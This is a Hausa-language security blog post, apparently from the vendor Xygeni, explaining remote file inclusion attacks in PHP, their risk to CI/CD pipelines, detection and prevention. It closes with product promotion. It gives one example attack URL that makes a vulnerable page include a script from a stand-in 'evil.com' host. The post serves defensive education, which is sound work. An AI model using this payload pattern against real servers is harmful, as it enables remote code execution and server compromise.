aiwatar da lambar nesa​ - menene haɗa fayilolin nesa

Haɗa Fayil Mai Nesa: Yadda Yake Faruwa da Ta Yaya Masu Haɓaka Za Su Iya Hana Shi?

Me Yasa Haɗa Fayiloli Daga Nesa Yake Da Muhimmanci a Tsarin Samar da Manhaja?

Menene Haɗa Fayil Mai Nesa?

Fahimtar abin da ake nufi da haɗa fayiloli daga nesa yana da mahimmanci ga masu haɓakawa waɗanda ke neman kare aikace-aikacen su a farkon zagayowar rayuwar haɓaka software (SDLC) Wannan rauni, wanda galibi ana yin watsi da shi, yana bawa masu hari damar saka lambar nesa da aiwatar da ita, suna sanya tsarin ku da pipelineyana cikin haɗari. 

Haɗa fayilolin nesa (RFI) wani muhimmin rauni ne na tsaro wanda ke ba wa maharan damar haɗawa da aiwatar da fayilolin waje akan sabar ku, wanda galibi yakan haifar da aiwatar da lambar nesa (RCE). A aikace, wannan yana nufin mai cutarwa zai iya gudanar da lambar ba bisa ƙa'ida ba a cikin yanayin ku, ya lalata ginin, ko kuma ya saka kayan tarihi masu haɗari a cikin na'urar ku. pipelineAbin da ya fara a matsayin ƙaramin matsalar tabbatar da shigarwa na iya zama babbar barazana ga sarkar samar da software.

Duk da cewa RFI galibi ana danganta ta da PHP, tsarin da ke ƙasa, loda fayiloli marasa aminci bisa ga shigarwar mai amfani, na iya shafar harsunan shirye-shirye da yawa da kuma CI/CD Tsarin aiki. Shi ya sa fahimtar wannan rauni yana da mahimmanci ga ƙungiyoyin ci gaba na zamani, musamman lokacin da dole ne a saka tsaro daga lambar zuwa tsarin aiki.

A zahiri, hare-haren haɗa fayiloli na nesa sun haifar da aiwatar da lambar nesa ba tare da izini ba, cikakken sulhu tsakanin sabar, fitar da bayanai masu mahimmanci, da kuma keta iyakokin aminci a cikin sarƙoƙin samar da software. Wannan rauni yawanci yana shafar aikace-aikacen da ke tushen PHP da yanayin sarrafa fayil mai ƙarfi, kodayake irin waɗannan tsare-tsare na iya bayyana a cikin wasu harsunan shirye-shirye da tsarin. Bari mu zurfafa cikin dalilin da yasa fahimtar menene haɗa fayiloli na nesa da yadda yake aiki zai iya taimakawa hana faruwar haɗarin aiwatar da lambar nesa.

Ta yaya Hada Fayil Mai Nesa Ke Aiki?

Haɗa fayiloli daga nesa (RFI) yana faruwa ne lokacin da aikace-aikacen ya haɗa da fayilolin waje bisa ga tsarin shigar da mai amfani wanda ba a tabbatar da ingancinsa ba. Wannan yana buɗe ƙofa ga masu kai hari don shigar da lambar mugunta daga majiyoyi masu nisa, wanda galibi yakan haifar da aiwatar da lambar nesa (RCE).

Yadda Amfanin Yake Aiki - Mataki-mataki

  1. Shigarwar da ba a tabbatar ba: Manhajar tana amfani da sigar tambaya ko wani shigarwar mai amfani don yanke shawara kan wane fayil za a haɗa.
  2. Haɗa Fayil Mai Nesa: Ana amfani da wannan shigarwar kai tsaye a cikin aikin haɗa fayiloli (kamar include() a cikin PHP), ba tare da duba asali ko inganci ba.
  3. Kuskuren Kullun: Idan shigarwar ta nuna wani mummunan rubutun nesa, uwar garken zai ɗauko ta kuma aiwatar da ita, wanda hakan zai lalata tsarin.

Misali na Lambar PHP Mai Rauni:

A cikin wannan misalin, mai hari zai iya sarrafa sigar shafin don yin nuni ga URL na waje mai cutarwa, wanda ke haifar da aiwatar da lambar nesa.

Hanyoyin allurar da aka saba amfani da su sun haɗa da wucewar URLs masu nisa a matsayin sigogin tambaya. Masu kai hari suna ɗaukar nauyin rubutun mugunta a waje kuma suna gyara URL kamar haka: http://example.com/index.php?page=http://evil.com/malicious.php

Yanayin Hari

Wannan yanayin yana nuna yadda RFI ke wucewa fiye da lambar lokacin gudu kuma yana shafar yadda RFI ke shafar sarkar samar da softwareDa zarar an ja kayan tarihi masu cutarwa cikin wani pipeline, masu kai hari za su iya lalata gine-ginen, su lalata dabarun tura su, ko kuma su tona asirin daga cikin amintaccen muhalli.

  • Shigar da Shell na Yanar Gizo: Masu kai hari suna ɗora harsashin yanar gizo na nesa, wanda ke ba da damar shiga nesa akai-akai.
  • Tallafin Malware: Sabar yanar gizo na waje suna isar da malware ko masu ɓoye bayanai ta hanyar RFI.
  • Aiwatar da Lambar a cikin Pipelines: Idan raunin RFI ya shafi tsarin baya ko muhallin ginawa ta atomatik, fayilolin waje da aka lalata na iya zama kayan tarihi na nesa da aka allura, wanda ke barazana ga software gaba ɗaya pipelines kuma yana haifar da aiwatar da lambar nesa da ba a gano ba a cikin ayyukan DevOps. 

Tsarin hare-hare na yau da kullun:

 1. Maharin ya dauki nauyin wani mummunan rubutu

 2. Sarrafa sigogin URL yana jagorantar aikace-aikacen don ɗaukar da aiwatar da wannan rubutun nesa

 3. Sabar tana aiwatar da lambar da ba a amince da ita ba, tana lalata muhallinta da kuma tsarin da zai iya zama na ƙarshe.

A cikin haɓaka tsaro, sanin menene haɗa fayiloli daga nesa zai iya taimaka wa ƙungiyoyi su guji shigar da irin waɗannan raunin a farkon zagayowar rayuwar software.

Ganowa da Alamun Rauni a Haɗa Fayil Daga Nesa

Gano raunin fayiloli na nesa Rashin raunin haɗawa yana buƙatar nazarin lambar da ba ta canzawa da kuma sa ido kan halaye. Tunda RFI sau da yawa tana amfani da tsarin lambobi marasa lahani, ƙungiyoyin haɓakawa da tsaro dole ne su kula da ayyukan lambar marasa tsaro da halayen lokacin aiki marasa kyau waɗanda ke nuna iyakokin aminci da aka lalata. Ga manyan alamu don taimakawa wajen gano haɗarin RFI da wuri a cikin zagayowar rayuwar software ɗinku.

  • Manuniyar Bitar Lambobi:
    • Amfani da haɗa fayil mai ƙarfi ba tare da ingantaccen tabbatarwa ba
    • Haɗa fayilolin nesa bisa ga sigogin URL
  • Alamomin Halayya:
    • Kiran albarkatun nesa da ba a zata ba daga sabobin amintacce
    • Rikodi suna nuna abubuwan da aka haɗa fayilolin waje
    • An aiwatar da rubuce-rubuce marasa amfani daga hanyoyin da ba na gida ba, suna nuna iyakokin aminci da aka yi wa rauni
  • Kayan Aikin Ganowa:
    • Gwajin Tsaron Aikace-aikace Mai Tsayi (SAST)
    • Gwajin Tsaron Aikace-aikacen Mai Sauƙi (Dast)
    • Binciken Tsarin Software (SCA)
    • Gano Anomaly don buƙatun waje na musamman.

A Zurfafa nutsewa cikin CI/CD PipelineRashin lafiyar s

Duba jerin labaran mu na blog akan Poisoned Pipeline Aiwatarwa (PPE)

Karatu mai danganta:

Hadari da Tasirin Kasuwanci

  • Exfiltration Data: Ana iya ɓoye bayanai masu mahimmanci ta hanyar amfani da rubutun nesa mai cutarwa
  • Yarjejeniyar Sabar: Sau da yawa RFI yana haifar da cikakken karɓewar sabar (server)
  • Allurar Kayan Aiki Mai Lalacewa Daga Nesa: Da zarar wani mahari ya yi allurar wani abu daga nesa, ginin da ke ƙasa da wurin zai iya haifar da gurɓatawa.
  • Iyakokin Amincewa da Aka Keta: CI/CD pipelines yana aiwatar da ingancin sarkar samar da kayayyaki ta hanyar karya lambar da ba a amince da ita ba
  • Hadarin Biyayya: Rashin bin ka'idojin GDPR, PCI DSS, da sauran su standardsaboda rashin ingantattun hanyoyin kiyaye lambar sirri

Dabaru na Rigakafi ga Masu Haɓaka

A nan za ku ga jerin wasu dabarun rigakafi da za su iya taimaka muku:

Tabbatar da Shigarwa da Tsaftacewa

  • Jerin hanyoyin fayil masu karɓuwa cikin tsauraran ƙa'idodi
  • Guje wa hanyoyin fayil masu ƙarfi duk lokacin da zai yiwu
  • Tabbatar da MIME/nau'in da kuma aiwatar da tsawaita fayiloli masu aminci
  • Yi amfani da ɗakunan karatu na tabbatar da shigarwar takamaiman harshe

Amintattun Ayyukan Coding

  • Kashe haɗa fayiloli daga nesa ta amfani da tsari kamar allow_url_include=Kashe (PHP)
  • Aiwatar da hanyoyi na asali, tabbatattu, na gida don duk abubuwan da aka haɗa fayiloli
  • Aiwatar da ƙa'idar mafi ƙarancin gata a cikin yanayin aikace-aikace
  • Toshe albarkatun nesa marasa sa hannu ko marasa aminci

DevSecOps da kuma CI/CD Guardrails

  • Aiwatar da na'urar daukar hoto mai motsi da tsauri a cikin CI/CD pipelines
  • Create guardrails don ganowa da toshe abubuwan da aka haɗa na fayiloli daga nesa
  • Aiwatar da ƙa'idodin ƙa'idoji masu tsauri game da haɗa fayiloli masu ƙarfi da waɗanda ba a tabbatar da su ba
  • Sa ido kan hanyoyin ginawa don buƙatun albarkatun waje waɗanda ba a amince da su ba

Dabaru na Kariyar Lokacin Aiki

  • Yi amfani da Wutar Lantarki ta Aikace-aikacen Yanar Gizo (WAFs) don toshe buƙatun cutarwa
  • Yi amfani da ci gaba da gano abubuwan da ba su da kyau da kuma sa ido kan tsaro
  • Gudanar da binciken lambobi na yau da kullun da gwajin shigar da bayanai ta hanyar tsaro

Amsa Wajen Hadarin

Me Za A Yi Idan Ana Amfani da Fayil ɗin Nesa?

Bi waɗannan matakan:

  • Nan da nan a ware sabar ko ayyukan da abin ya shafa
  • Yi nazarin rajistan ayyukan don bin diddigin ayyukan maharan da kuma gano albarkatun da aka lalata
  • Faci lambar mai rauni kuma sake saita aikace-aikacen da abin ya shafa
  • Yi nazarin shari'a don tabbatar da sahihancin shari'ar da aka yi a baya pipeline aka gyara
  • Ƙarfafa iko don hana sake dawowa

Don haka, Yi Amfani da Haɗa Fayilolin Nesa a Matsayin Barazana ga Sarkar Samar da Software

Yanzu da ka san menene haɗa fayiloli daga nesa, bai kamata ka sake ɗaukarsa a matsayin wata matsala ta lambar sirri ba. Yana da matuƙar muhimmanci wanda zai iya shigar da kayan tarihi masu cutarwa da kuma karya iyakokin aminci a cikin software ɗinka. pipelines. Ta hanyar yin amfani da sabar baya ko CI/CD Ta hanyar amfani da hanyoyin sadarwa, RFI tana bawa masu hari damar yin amfani da na'urorin da aka gina, gabatar da canje-canje marasa izini, da kuma yada lambar da aka lalata a ƙasa. Yin watsi da haɗarin aiwatar da lambar nesa da ke tasowa daga RFI na iya barin sarkar samar da kayayyaki ta zama mai rauni.

Dole ne ƙungiyoyi su saka matakan rigakafin RFI a duk lokacin SDLC da kuma CI/CD Ayyukan aiki. Wannan ya haɗa da nazarin da ba ya canzawa da kuma mai ƙarfi, tabbatar da shigarwar bayanai sosai, taurare kayayyakin more rayuwa, da kuma ci gaba da sa ido. Ilimi ga masu haɓakawa da kuma ayyukan tsaro ta hanyar ƙira suna da mahimmanci don kare kai daga RFI da hare-haren sarkar samar da kayayyaki masu alaƙa.

A ƙarshe amma ba mafi ƙaranci ba, tabbatar da sarƙoƙin samar da software na zamani yana buƙatar taka tsantsan game da rauni kamar haɗa fayiloli daga nesa waɗanda zasu iya ƙaruwa daga kurakurai masu sauƙi zuwa pipeline-faɗin yarjejeniya, wanda ke haifar da yanayi masu haɗari na aiwatar da lambar nesa.

Kana son koyo daga manyan masana harkar tsaro ta yanar gizo? Kalli tattaunawarmu ta SafeDev akan Rauni Mara Iyaka, Kariya Mai Wayo - Kewaya Hadarin Manhajar Zamani akan YouTube!

Yadda Xygeni Zai Iya Taimakawa

Xygeni yana ba da kariya mai ƙarfi daga hare-haren RFI ta hanyar saka na'urorin tsaro na ainihin lokaci a duk faɗin na'urarka CI/CD pipelines:

  • Yana toshe abubuwan da ba a amince da su ba daga nesa a matakin ginawa ta amfani da customizable guardrails.
  • Yana gano halayen da ba su dace ba kamar abubuwan da ake zargi a waje, aiwatar da rubutun da ba a zata ba, ko kayan tarihi na nesa marasa sa hannu.
  • Yana tabbatar da tsauraran halayen kayan tarihi tare da tabbatarwa da tabbatar da asalin, tabbatar da cewa lambar da aka amince da ita ce kawai ke motsawa ta cikin na'urarka SDLC.
    Masu saka idanu CI/CD tsare-tsare da ma'anonin aiki don hana fallasa ga haɗarin RFI ba da gangan ba a cikin rubutun gini ko plugins.

Ta hanyar ci gaba da bincika kurakurai, nazarin halayen lambar, da kuma tabbatar da kayan tarihi a ainihin lokaci, Xygeni yana dakatar da RFI da sauran barazanar aiwatarwa daga nesa kafin su fara aikin.

Fara gwajin ku na kyauta kuma ga yadda Xygeni ke kare tsarin samar da manhajojin ku daga hare-haren RFI da ma wasu wurare.

kayan aikin nazarin kayan aikin sca-tools-composition
Fifiko, gyara, da kuma kare haɗarin software ɗinka
Sami Asusunka Kyauta.
Babu katin bashi da ake bukata.

Tabbatar da Haɓaka Software da Isarwarka

tare da Xygeni Product Suite